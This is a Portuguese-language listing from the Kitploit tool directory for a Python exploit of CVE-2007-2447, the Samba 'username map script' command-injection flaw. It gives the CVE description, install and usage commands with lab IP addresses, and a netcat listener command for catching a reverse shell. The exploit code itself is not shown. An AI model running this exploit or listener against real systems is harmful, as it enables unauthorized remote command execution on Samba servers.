Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2007-2447 — Exploit em Python para CVE-2007-2447 visando a vulnerabilidade de script de mapeamento de nome de usuário do Samba, permitindo execução remota de comandos via metacaracteres de shell com entrega de payload de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/0xkn/cve-2007-2447
Análise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub0xkn/cve-2007-2447

CVE-2007-2447

Exploit em Python para CVE-2007-2447 visando a vulnerabilidade de script de mapeamento de nome de usuário do Samba, permitindo execução remota de comandos via metacaracteres de shell com entrega de payload de shell reverso.

Ver Repositório
há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2007-2447 - script de mapeamento de nomes de usuário

"A funcionalidade MS-RPC no smbd no Samba 3.0.0 até 3.0.25rc3 permite que atacantes remotos executem comandos arbitrários através de metacaracteres de shell envolvendo a função (1) SamrChangePassword, quando a opção "username map script" do smb.conf está habilitada, e permite que usuários autenticados remotos executem comandos através de metacaracteres de shell envolvendo outras funções MS-RPC no (2) gerenciamento de impressora remota e (3) compartilhamento de arquivos."

Exploit

Instalação:

[*] Este exploit requer Python 3.7 ou superior

root@kitploit:~
python3 -m pip install pysmb 

Uso:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- Host Remoto
  • --lhost -- Host Local
  • --lport -- Porta Local
  • --rport -- Porta Remota [*] Opcional. padrão=445

Não se esqueça de iniciar seu listener:

root@kitploit:~
nc -lvnp 4444

PoC

image

Baixar ferramenta